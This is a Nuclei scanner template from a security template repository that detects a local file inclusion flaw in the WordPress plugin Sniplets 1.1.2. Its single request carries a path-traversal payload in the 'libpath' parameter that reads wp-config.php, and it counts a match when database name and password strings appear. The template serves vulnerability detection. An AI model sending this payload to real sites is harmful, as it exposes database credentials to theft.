nuclei-templates/vulnerabilities/wordpress/sniplets-lfi.yaml

28 lines
575 B
YAML
Raw Normal View History

id: sniplets-lfi
2022-02-12 17:57:12 +00:00
info:
name: Wordpress Plugin Sniplets 1.1.2 - LFI
2022-02-12 17:57:12 +00:00
author: dhiyaneshDK
severity: high
reference:
- https://www.exploit-db.com/exploits/5194
tags: wordpress,wp-plugin,lfi,wp
2022-02-12 17:57:12 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
2022-02-12 17:57:12 +00:00
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200